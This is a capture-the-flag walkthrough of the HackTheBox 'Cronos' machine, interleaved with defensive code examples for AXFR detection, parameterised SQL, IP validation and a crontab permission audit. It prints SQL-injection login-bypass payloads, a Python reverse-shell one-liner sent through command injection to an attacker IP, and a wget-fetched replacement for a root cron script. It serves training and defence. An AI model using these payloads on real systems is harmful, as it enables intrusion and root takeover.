
Cronos

Machine Name: Cronos - HTB
Level: Medium
OS: Linux

Walkthrough

Let's start with an nmap scan.


PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA)
|   256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA)
|_  256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519)
53/tcp open  domain  ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.10.3-P4-Ubuntu
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

First I went to port 80 and found nothing there. So I tried to gather information from port 53 instead.

┌──(root💀kali)-[/home/…/Desktop/HTB/Linux/cronos]
└─# nslookup                                                                                                                                                                                          1 ⨯
> server 10.10.10.13
Default server: 10.10.10.13
Address: 10.10.10.13#53
> 10.10.10.13
13.10.10.10.in-addr.arpa    name = ns1.cronos.htb.
> 

After that I tried to enumerate all the hosts by requesting a zone transfer (AXFR) for cronos.htb.


┌──(root💀kali)-[/home/…/Desktop/HTB/Linux/cronos]
└─# host -l -a cronos.htb 10.10.10.13                     
Trying "cronos.htb"
Using domain server:
Name: 10.10.10.13
Address: 10.10.10.13#53
Aliases: 

;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 26260
;; flags: qr aa ra; QUERY: 1, ANSWER: 7, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;cronos.htb.            IN  AXFR

;; ANSWER SECTION:
cronos.htb.     604800  IN  SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb.     604800  IN  NS  ns1.cronos.htb.
cronos.htb.     604800  IN  A   10.10.10.13
admin.cronos.htb.   604800  IN  A   10.10.10.13
ns1.cronos.htb.     604800  IN  A   10.10.10.13
www.cronos.htb.     604800  IN  A   10.10.10.13
cronos.htb.     604800  IN  SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800

Received 192 bytes from 10.10.10.13#53 in 83 ms

I added these hosts to my /etc/hosts and continued.
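The zone transfer above succeeded because the server answered an AXFR from an arbitrary client. On the defending side, BIND records every transfer it serves in its xfer-out log category, so the same event can be alerted on. The following is an added example, not part of the original post: it parses constructed BIND-style log lines (the addresses and zone name reuse the ones above, but the lines themselves are made up for this example) and reports any transfer served to a host that is not on the list of known secondaries.

```python
import re

# Constructed sample of BIND "xfer-out" log lines (not captured from the machine);
# the layout mirrors what named writes when it serves a zone transfer.
SAMPLE_LOG = """\
29-Aug-2021 12:40:01.123 xfer-out: info: client 10.10.14.4#45130 (cronos.htb): transfer of 'cronos.htb/IN': AXFR started
29-Aug-2021 12:40:01.125 xfer-out: info: client 10.10.14.4#45130 (cronos.htb): transfer of 'cronos.htb/IN': AXFR ended
29-Aug-2021 12:41:07.004 queries: info: client 10.10.14.4#53120 (www.cronos.htb): query: www.cronos.htb IN A + (10.10.10.13)
29-Aug-2021 12:45:10.001 xfer-out: info: client 10.10.10.13#51000 (cronos.htb): transfer of 'cronos.htb/IN': AXFR started
"""

# Newer BIND releases add a "@0x..." client handle after "client"; it is optional here.
XFER_RE = re.compile(
    r"client (?:@0x[0-9a-f]+ )?(?P<ip>[0-9a-fA-F.:]+)#\d+ \((?P<qname>[^)]+)\): "
    r"transfer of '(?P<zone>[^/']+)/IN': (?P<type>AXFR|IXFR) started"
)

def unauthorized_transfers(log_text, allowed_secondaries):
    """Return (client_ip, zone, type) for every zone transfer served to a host
    that is not a known secondary. Only 'started' lines are counted so that
    one transfer yields exactly one finding."""
    findings = []
    for line in log_text.splitlines():
        m = XFER_RE.search(line)
        if m and m.group("ip") not in allowed_secondaries:
            findings.append((m.group("ip"), m.group("zone"), m.group("type")))
    return findings

if __name__ == "__main__":
    # 10.10.10.13 is treated as the only legitimate secondary for this example.
    for ip, zone, kind in unauthorized_transfers(SAMPLE_LOG, {"10.10.10.13"}):
        print(f"ALERT: {kind} of {zone} served to unlisted client {ip}")
```

Detection is the second line of defence; the fix is in named.conf, where `allow-transfer` should list only the real secondaries (or `none;` when there are none), so the server refuses the AXFR instead of logging it after the fact.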

Scans with gobuster and dirb did not turn up anything important, but I suspected SQL injection on the admin.cronos.htb login page. So I found an SQLi wordlist online and fed it to hydra as both the user and the password list. The page with the wordlist: https://book.hacktricks.xyz/pentesting-web/login-bypass/sql-login-bypass


┌──(root💀kali)-[/home/…/Desktop/HTB/Linux/cronos]
└─# hydra -L sql.txt -P sql.txt admin.cronos.htb http-post-form "/:username=^USER^&password=^PASS^:Your Login Name or Password is invalid"
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-08-28 04:53:30
[DATA] max 16 tasks per 1 server, overall 16 tasks, 649636 login tries (l:806/p:806), ~40603 tries per task
[DATA] attacking http-post-form://admin.cronos.htb:80/:username=^USER^&password=^PASS^:Your Login Name or Password is invalid
[STATUS] 1588.00 tries/min, 1588 tries in 00:01h, 648048 to do in 06:49h, 16 active
[STATUS] 1611.33 tries/min, 4834 tries in 00:03h, 644802 to do in 06:41h, 16 active
[80][http-post-form] host: admin.cronos.htb   login: ' or 1 or '   password: admin
[80][http-post-form] host: admin.cronos.htb   login: ' or 1 or '   password: 1234
[80][http-post-form] host: admin.cronos.htb   login: ' or 1 or '   password: 123456
[80][http-post-form] host: admin.cronos.htb   login: ' or 1 or '   password: toor
[80][http-post-form] host: admin.cronos.htb   login: ' or 1 or '   password: password
[80][http-post-form] host: admin.cronos.htb   login: ' or 1 or '   password: root
[80][http-post-form] host: admin.cronos.htb   login: ' or 1 or '   password: test
[80][http-post-form] host: admin.cronos.htb   login: ' or 1 or '   password: guest
[80][http-post-form] host: admin.cronos.htb   login: ' or 1 or '   password: ' or ''='
[80][http-post-form] host: admin.cronos.htb   login: ' or 1 or '   password: ' or '1'='1
[80][http-post-form] host: admin.cronos.htb   login: ' or 1 or '   password: ' or 1]%00
[80][http-post-form] host: admin.cronos.htb   login: ' or 1 or '   password: ' or true() or '
[80][http-post-form] host: admin.cronos.htb   login: ' or 1 or '   password: ' or /* or '
[80][http-post-form] host: admin.cronos.htb   login: ' or 1 or '   password: ' or "a" or '
[80][http-post-form] host: admin.cronos.htb   login: ' or 1 or '   password: ' or 1 or '
[80][http-post-form] host: admin.cronos.htb   login: ' or 1 or '   password: 'or string-length(name(.))<10 or'
[STATUS] 1729.00 tries/min, 12103 tries in 00:07h, 637533 to do in 06:09h, 16 active
[80][http-post-form] host: admin.cronos.htb   login: admin' or '   password: admin
[80][http-post-form] host: admin.cronos.htb   login: admin' or '   password: 123456
[80][http-post-form] host: admin.cronos.htb   login: admin' or '   password: password
[80][http-post-form] host: admin.cronos.htb   login: admin' or '   password: root
[80][http-post-form] host: admin.cronos.htb   login: admin' or '   password: 1234
[80][http-post-form] host: admin.cronos.htb   login: admin' or '   password: test
[80][http-post-form] host: admin.cronos.htb   login: admin' or '   password: ' or '1'='1
[80][http-post-form] host: admin.cronos.htb   login: admin' or '   password: toor
[80][http-post-form] host: admin.cronos.htb   login: admin' or '   password: ' or ''='
[80][http-post-form] host: admin.cronos.htb   login: admin' or '   password: ' or 1]%00
[80][http-post-form] host: admin.cronos.htb   login: admin' or '   password: guest
[80][http-post-form] host: admin.cronos.htb   login: admin' or '   password: ' or /* or '
[80][http-post-form] host: admin.cronos.htb   login: admin' or '   password: ' or 1 or '
[80][http-post-form] host: admin.cronos.htb   login: admin' or '   password: ' or true() or '
[80][http-post-form] host: admin.cronos.htb   login: admin' or '   password: ' or "a" or '
[80][http-post-form] host: admin.cronos.htb   login: admin' or '   password: 'or string-length(name(.))<10 or'
[80][http-post-form] host: admin.cronos.htb   login: admin' or '1'='2   password: admin
[80][http-post-form] host: admin.cronos.htb   login: admin' or '1'='2   password: password
[80][http-post-form] host: admin.cronos.htb   login: admin' or '1'='2   password: 123456
[80][http-post-form] host: admin.cronos.htb   login: admin' or '1'='2   password: root
[80][http-post-form] host: admin.cronos.htb   login: admin' or '1'='2   password: 1234
[80][http-post-form] host: admin.cronos.htb   login: admin' or '1'='2   password: toor
[80][http-post-form] host: admin.cronos.htb   login: admin' or '1'='2   password: test
[80][http-post-form] host: admin.cronos.htb   login: admin' or '1'='2   password: guest
[80][http-post-form] host: admin.cronos.htb   login: admin' or '1'='2   password: ' or '1'='1
[80][http-post-form] host: admin.cronos.htb   login: admin' or '1'='2   password: ' or /* or '
[80][http-post-form] host: admin.cronos.htb   login: admin' or '1'='2   password: ' or ''='
[80][http-post-form] host: admin.cronos.htb   login: admin' or '1'='2   password: ' or 1]%00
[80][http-post-form] host: admin.cronos.htb   login: admin' or '1'='2   password: ' or "a" or '
[80][http-post-form] host: admin.cronos.htb   login: admin' or '1'='2   password: ' or 1 or '
[80][http-post-form] host: admin.cronos.htb   login: admin' or '1'='2   password: ' or true() or '
[80][http-post-form] host: admin.cronos.htb   login: admin' or '1'='2   password: 'or string-length(name(.))<10 or'
^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session.
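Every "login" line hydra printed above is the same bug seen from outside: the username is pasted into the SQL string, so a quote in the input rewrites the WHERE clause. The block below is an added example, not code from the original post or from the box itself; it uses a constructed in-memory SQLite table and a made-up credential to show the string-built query being bypassed by one of the payloads hydra reported, and the parameterised form of the same query refusing it.

```python
import sqlite3

def make_db():
    """Constructed in-memory users table standing in for the admin site's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'correct-horse')")  # constructed credential
    conn.commit()
    return conn

def login_vulnerable(conn, username, password):
    """String-built query: quotes in the input become part of the SQL."""
    sql = (f"SELECT username FROM users "
           f"WHERE username='{username}' AND password='{password}'")
    return conn.execute(sql).fetchone() is not None

def login_safe(conn, username, password):
    """Parameterised query: the input is bound as data and cannot alter the WHERE clause."""
    sql = "SELECT username FROM users WHERE username=? AND password=?"
    return conn.execute(sql, (username, password)).fetchone() is not None

BYPASS = "' or 1 or '"   # one of the login values hydra reported as accepted above

if __name__ == "__main__":
    conn = make_db()
    # The vulnerable query becomes: ... WHERE username='' or 1 or '' AND password='anything'
    print("vulnerable, bypass payload :", login_vulnerable(conn, BYPASS, "anything"))
    print("vulnerable, real creds     :", login_vulnerable(conn, "admin", "correct-horse"))
    print("safe, bypass payload       :", login_safe(conn, BYPASS, "anything"))
    print("safe, real creds           :", login_safe(conn, "admin", "correct-horse"))
```

Two things worth noting from the hydra output itself: with AND binding tighter than OR, `' or 1 or '` makes the clause true regardless of the password, which is why every password in the list "worked"; and a login endpoint taking 1,500+ attempts per minute from one source, as shown in the STATUS lines, is a signal a rate limit or lockout should have caught long before the injection mattered.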

Great, now let's log in. After logging in I saw a page () where we could execute commands.

8.8.8.8; python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.4",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

I sent the payload above and caught the reverse shell.


┌──(root💀kali)-[/home/…/Desktop/HTB/Linux/cronos]
└─# nc -lvp 1234       
listening on [any] 1234 ...
connect to [10.10.14.4] from cronos.htb [10.10.10.13] 40338
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ 
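The page accepted an IP address and handed it to a shell, which is why `8.8.8.8;` followed by anything else ran as www-data. As an added example (not the box's PHP, and not code from the original post), here is the same "ping a host" feature in Python in its vulnerable shape next to a hardened one: the target must parse as an IP address and is passed as a single argv element, so no shell ever sees it. The `; id` tail is a constructed stand-in for the payload shape shown above.

```python
import ipaddress
import subprocess

def ping_command_vulnerable(host):
    """How the vulnerable page behaves: user input is spliced into a shell
    command line, so ';' ends ping and starts whatever follows."""
    return f"ping -c 1 {host}"          # this string is what would reach /bin/sh -c

def ping_command_safe(host):
    """Hardened version: the target must be a valid IPv4/IPv6 address and is
    returned as an argv list; anything else raises ValueError."""
    try:
        addr = ipaddress.ip_address(host.strip())
    except ValueError:
        raise ValueError(f"not an IP address: {host!r}") from None
    return ["ping", "-c", "1", str(addr)]

def run_ping(host, timeout=5):
    """Executes the hardened form without a shell; returns ping's stdout."""
    argv = ping_command_safe(host)
    return subprocess.run(argv, capture_output=True, text=True, timeout=timeout).stdout

INJECTED = "8.8.8.8; id"   # constructed stand-in for the page's payload shape

if __name__ == "__main__":
    print(ping_command_vulnerable(INJECTED))   # a shell would run ping, then id
    print(ping_command_safe("8.8.8.8"))
    try:
        ping_command_safe(INJECTED)
    except ValueError as e:
        print("rejected:", e)
```

Two choices carry the protection: validation by parsing (`ipaddress.ip_address`) rather than by blacklisting characters, and `subprocess.run` with a list so no shell metacharacter is ever interpreted. Running the web process as www-data limited the damage here, but the next step of this write-up shows why a foothold as that user was still enough.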

I could read the user flag directly.

python -c 'import pty; pty.spawn("/bin/bash")'
www-data@cronos:/var/www/admin$ 

www-data@cronos:/var/www/admin$ 

www-data@cronos:/var/www/admin$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@cronos:/var/www/admin$ 

www-data@cronos:/var/www/admin$ 

www-data@cronos:/var/www/admin$ cd /home
cd /home
www-data@cronos:/home$ ls
ls
noulis
www-data@cronos:/home$ cd noulis
cd noulis
www-data@cronos:/home/noulis$ ls
ls
user.txt
www-data@cronos:/home/noulis$ cat user.txt
cat user.txt
51d236438b333970dbba7dc3089be33b

While looking around inside, I saw that the artisan file was being run as root every minute by the cron entry below, and I also had write permission on it. So I prepared a reverse shell, uploaded it to the machine in place of artisan, then started a listener and became root.

* * * * *     root   php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1

www-data@cronos:/var/www/laravel$ wget http://10.10.14.4/artisan
wget http://10.10.14.4/artisan
--2021-08-29 12:52:12--  http://10.10.14.4/artisan
Connecting to 10.10.14.4:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5492 (5.4K) [application/octet-stream]
Saving to: 'artisan.1'

artisan.1           100%[===================>]   5.36K  --.-KB/s    in 0s      

2021-08-29 12:52:12 (471 MB/s) - 'artisan.1' saved [5492/5492]

www-data@cronos:/var/www/laravel$ rm artisan
rm artisan
www-data@cronos:/var/www/laravel$ mv artisan.1 artisan
mv artisan.1 artisan
┌──(root💀kali)-[/opt/PEASS-ng/linPEAS]
└─# nc -vlp 4444                                                                                       130 ⨯
listening on [any] 4444 ...
connect to [10.10.14.4] from cronos.htb [10.10.10.13] 55342
Linux cronos 4.4.0-72-generic #93-Ubuntu SMP Fri Mar 31 14:07:41 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 12:53:01 up 51 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=0(root) gid=0(root) groups=0(root)
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
# ls
root.txt
# cat root.txt
1703b8a3c9a8dde879942c79d02fd3a0
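The root path was a root cron job executing a file that a non-root user could replace. That condition is mechanically checkable. The following is an added example, not from the original post: it parses system-crontab-style lines (the `* * * * * root php /var/www/laravel/artisan ...` format shown above), pulls out every absolute path in the command, and reports the ones a non-root user could alter, either directly (ownership or write bits on the file) or by replacing the file through a writable parent directory, which is what the rm/mv above relied on.

```python
import os
import re
import stat

# /etc/crontab and /etc/cron.d entries: five time fields, a user name, then the command.
CRON_LINE = re.compile(r"^\s*(?:\S+\s+){5}(?P<user>\S+)\s+(?P<cmd>.+?)\s*$")
# Absolute paths mentioned anywhere in the command (script, interpreter, log file ...).
PATH_TOKEN = re.compile(r"(?<![\w/])(/[\w./-]+)")

def weaknesses(path):
    """Reasons a non-root local user could change what `path` runs as, or [] if none.
    Missing files and non-regular files (for example /dev/null) are ignored."""
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return []
    if not stat.S_ISREG(st.st_mode):
        return []
    reasons = []
    if st.st_uid != 0:
        reasons.append(f"file owned by uid {st.st_uid}, not root")
    if st.st_mode & stat.S_IWOTH:
        reasons.append("file is world-writable")
    if st.st_mode & stat.S_IWGRP and st.st_gid != 0:
        reasons.append(f"file is writable by gid {st.st_gid}")
    # Write access on the directory is enough to delete and replace the file.
    parent = os.stat(os.path.dirname(path) or "/")
    if parent.st_uid != 0 or parent.st_mode & stat.S_IWOTH:
        reasons.append("parent directory allows non-root replacement of the file")
    return reasons

def audit_crontab(text):
    """Return one finding dict per (entry, path) that a non-root user could alter."""
    findings = []
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        m = CRON_LINE.match(line)
        if not m:                      # variable assignments such as PATH=... fall through here
            continue
        for path in PATH_TOKEN.findall(m.group("cmd")):
            reasons = weaknesses(path)
            if reasons:
                findings.append({"user": m.group("user"), "path": path, "reasons": reasons})
    return findings

if __name__ == "__main__":
    # Run against the live system crontab when present.
    try:
        with open("/etc/crontab") as f:
            for hit in audit_crontab(f.read()):
                print(f"{hit['user']} runs {hit['path']}: {'; '.join(hit['reasons'])}")
    except FileNotFoundError:
        print("no /etc/crontab on this host")
```

The same check belongs in /etc/cron.d/* and in the per-user crontab of root. The remediation for the entry above is the usual one for scheduled jobs: the script and every directory on its path owned by root, mode 0755 or tighter, and no web-server-writable location anywhere in a root job's command line.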
Category: Walkthrough
